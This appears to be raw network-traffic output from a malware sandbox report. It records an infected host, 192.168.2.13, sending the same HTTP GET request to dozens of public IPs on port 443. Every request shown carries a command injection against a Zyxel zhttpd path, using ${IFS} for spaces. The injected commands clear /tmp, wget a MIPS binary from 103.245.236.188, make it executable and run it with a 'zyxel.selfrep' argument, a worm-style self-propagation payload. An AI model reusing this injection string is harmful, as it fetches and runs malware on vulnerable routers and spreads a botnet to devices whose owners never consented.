                                                Jan 12, 2024 18:24:52.259490013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8630192.168.2.135898084.227.233.208443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.259547949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8631192.168.2.1335698121.36.43.179443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.259598970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8632192.168.2.136036467.205.219.104443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.259655952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8633192.168.2.1342026138.66.225.146443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.259732008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8634192.168.2.13486389.84.23.230443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.259764910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8635192.168.2.1354296122.165.84.27443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.259854078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8636192.168.2.1348648189.39.204.156443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.259884119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8637192.168.2.1356998220.77.20.107443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.259937048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8638192.168.2.133946019.46.176.160443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.259999037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8639192.168.2.1354658114.117.69.224443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.260062933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8640192.168.2.133791688.212.62.42443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.260099888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8641192.168.2.134767088.159.63.56443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.260173082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8642192.168.2.134049895.33.230.150443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.260231972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8643192.168.2.133557487.26.92.179443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.260266066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8644192.168.2.1342188145.78.155.80443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.260308027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8645192.168.2.13576621.238.126.236443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.260366917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8646192.168.2.1349692196.218.237.156443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.260428905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8647192.168.2.1340838178.15.208.220443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.260473967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8648192.168.2.1356346177.212.183.138443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.260540962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8649192.168.2.134878850.42.194.95443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.260615110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8650192.168.2.1337730209.196.245.44443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.260668039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8651192.168.2.1350600162.55.107.150443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.260719061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8652192.168.2.1341634105.28.52.63443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.260763884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8653192.168.2.135382235.155.36.144443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.260817051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8654192.168.2.1341426167.136.223.95443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.260863066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8655192.168.2.133454487.12.35.215443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.260925055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8656192.168.2.1336712128.72.159.88443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.261008978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8657192.168.2.136040641.152.219.67443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.261028051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8658192.168.2.1360570207.93.213.218443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.261080027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8659192.168.2.135723439.0.232.95443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.261167049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8660192.168.2.1341928217.21.161.180443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.261229992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8661192.168.2.135968080.171.72.16443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.261281967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8662192.168.2.1360300204.135.161.191443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.261344910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8663192.168.2.1356374186.62.67.121443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.261400938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8664192.168.2.1352804113.126.157.147443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.261457920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8665192.168.2.1340526112.32.49.151443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.261503935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8666192.168.2.1359286146.211.36.132443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.261564970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8667192.168.2.1343066130.116.71.134443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.261605978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8668192.168.2.1360312216.57.75.48443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.261642933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8669192.168.2.1336192137.149.169.252443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.261701107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8670192.168.2.135584096.132.30.68443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.261759043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8671192.168.2.1345808203.231.231.87443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.261810064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8672192.168.2.1336296154.25.135.85443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.261866093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8673192.168.2.1350762130.65.32.195443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.261948109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8674192.168.2.1351844223.31.88.30443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.261985064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8675192.168.2.133556070.153.155.71443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.262043953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8676192.168.2.133325898.74.140.164443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.262094021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8677192.168.2.1354044198.76.163.14443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.262156963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8678192.168.2.1351006159.34.180.18443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.262195110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8679192.168.2.134864482.95.14.212443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.262315035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8680192.168.2.133307491.193.65.77443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.262350082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8681192.168.2.135653099.76.159.151443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.262408972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8682192.168.2.1348182111.246.123.41443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.262484074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8683192.168.2.135143096.48.207.101443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.262531996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8684192.168.2.1336388164.74.233.180443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.262578964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8685192.168.2.1344462187.87.229.160443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.262630939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8686192.168.2.1360226114.105.133.32443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.262687922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8687192.168.2.136096845.179.58.52443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.262742996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8688192.168.2.135398238.248.248.220443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.262797117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8689192.168.2.134114296.121.55.216443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.262845993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8690192.168.2.1339364116.157.187.250443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.262917042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8691192.168.2.134303641.140.245.8443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.262962103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8692192.168.2.1338146133.51.246.155443
                                                TimestampBytes transferredDirectionData
